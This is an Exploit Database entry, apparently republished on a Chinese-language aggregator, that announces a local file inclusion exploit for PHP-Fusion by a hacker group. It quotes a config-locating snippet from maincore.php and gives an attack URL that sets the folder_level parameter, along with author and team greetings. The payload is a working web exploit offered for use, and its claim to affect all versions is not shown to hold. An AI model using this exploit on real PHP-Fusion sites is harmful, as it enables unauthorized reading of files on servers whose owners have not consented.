PHP-Fusion – Local File Inclusion

• Exploit Database
• 17 阅读

• 作者： MoDaMeR
  日期： 2010-08-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14647/

• # Exploit Title: PHP-Fusion Local File Includes Vulnerability
  # Date: 2010/08/15
  # Author: MoDaMeR
  # Email: k@live.ma
  # My Sites : www.v4-team.com & www.hackteach.org
  # Script home: http://www.phpfusion-ar.com
  # download Script:
  http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
  # Version:all
  # Tested on: Linux
  # Team hacker:Mr.Mo0oM & Dr.xp
  فلسطين كلنا فداءً لكِ
   :::::::::::::::::::::::::
  =================Exploit=================
  maincore.php
  [php]
   // Locate config.php and set the basedir path
  $folder_level = ""; $i = 0;
  while (!file_exists($folder_level."config.php")) {
  $folder_level .= "../"; $i++;
  if ($i == 5) { die("Config file not found"); }
  }
  require_once $folder_level."config.php";
  define("BASEDIR", $folder_level);
  [/php]
  ----exploit----
  
  http://{localhost}/{path}/maincore.php?folder_level=LFI
  
  ---------greatz----------
  Greatz to :
  aB0 m0h4mM3d , and all v4-team & hackteach members